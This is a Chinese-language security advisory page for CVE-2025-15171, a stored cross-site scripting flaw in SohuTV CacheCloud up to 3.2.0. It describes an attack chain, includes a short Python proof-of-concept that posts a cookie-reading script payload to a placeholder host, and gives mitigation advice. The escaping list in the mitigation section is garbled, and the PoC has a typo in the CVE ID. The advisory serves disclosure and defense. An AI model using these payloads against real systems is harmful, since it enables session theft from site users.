CVE-2025-15171 CVSS 3.5 低危

CVE-2025-15171 SohuTV CacheCloud ServerController.java 跨站脚本漏洞

披露日期: 2025-12-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15171

漏洞类型

XSS跨站脚本

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SohuTV CacheCloud

漏洞概述

CVE-2025-15171是SohuTV CacheCloud中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响CacheCloud版本直至3.2.0，问题出现在ServerController.java文件的index函数中。攻击者可以通过构造恶意脚本并将其注入到受影响的功能模块中，当其他用户访问该页面时，恶意脚本将在受害者浏览器中执行。这可能导致窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件等危害。由于该漏洞需要低权限用户配合用户交互才能触发，因此CVSS评分仅为3.5，属于低危级别。值得注意的是，该漏洞的利用代码已在公开渠道出现，项目方虽已收到问题报告但尚未做出响应。

技术细节

该漏洞位于com.sohu.cache.web.controller.ServerController.java文件的index方法中。攻击者利用该接口对用户输入缺乏充分过滤和转义的缺陷，将恶意JavaScript代码注入到页面内容中。由于是存储型XSS，恶意脚本会被永久保存在服务器端，所有访问该页面的用户都会受到攻击。攻击者通常通过在表单输入字段或URL参数中插入<script>alert('XSS')</script>或类似payload来验证漏洞存在。成功利用后可窃取受害者的认证令牌、操纵页面内容或重定向用户到恶意站点。该漏洞属于OWASP Top 10中的A03:2021 - Injection类别，开发者应使用上下文感知转义库对所有用户输入进行适当编码后再输出。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统为SohuTV CacheCloud，并定位到存在漏洞的ServerController接口

STEP 2

Payload构造

攻击者构造恶意JavaScript代码，如<script>alert(document.cookie)</script>作为XSS payload

STEP 3

漏洞注入

通过存在漏洞的输入接口将恶意脚本提交，由于缺乏输入过滤，脚本被存储在服务器端

STEP 4

触发执行

当其他用户访问包含恶意脚本的页面时，浏览器会执行注入的JavaScript代码

STEP 5

会话窃取

恶意脚本窃取受害者的Cookie、会话令牌或其他敏感信息并发送给攻击者

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-2025-15171 XSS PoC for SohuTV CacheCloud
# Target: ServerController.java index function

target_url = "http://target-host/cachecloud/server/index"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# PoC for Stored XSS
data = {
    "param": xss_payload  # Adjust parameter name based on actual endpoint
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    if xss_payload in response.text:
        print("[+] XSS payload reflected - Vulnerability confirmed!")
    else:
        print("[-] Payload not found in response")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")

影响范围

SohuTV CacheCloud <= 3.2.0

防御指南

临时缓解措施

在官方修复版本发布前，可通过对ServerController.java的index方法添加输入过滤逻辑来临时缓解。对所有用户可控的输出使用HTML实体编码（<转义为<、>转义为>、"转义为"、'转义为'、/转义为/）。同时配置Web应用防火墙（WAF）规则检测和拦截XSS攻击特征。建议监控相关GitHub Issue（#367）获取官方修复进展。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15171
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15171
3 Details https://www.cvedetails.com/cve/CVE-2025-15171/
4 VulDB https://vuldb.com/cve/CVE-2025-15171
5 Link https://github.com/sohutv/cachecloud/issues/367
6 Link https://github.com/sohutv/cachecloud/issues/367#issue-3733551662
7 Link https://vuldb.com/?ctiid.338556
8 Link https://vuldb.com/?id.338556
9 Link https://vuldb.com/?submit.716304

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表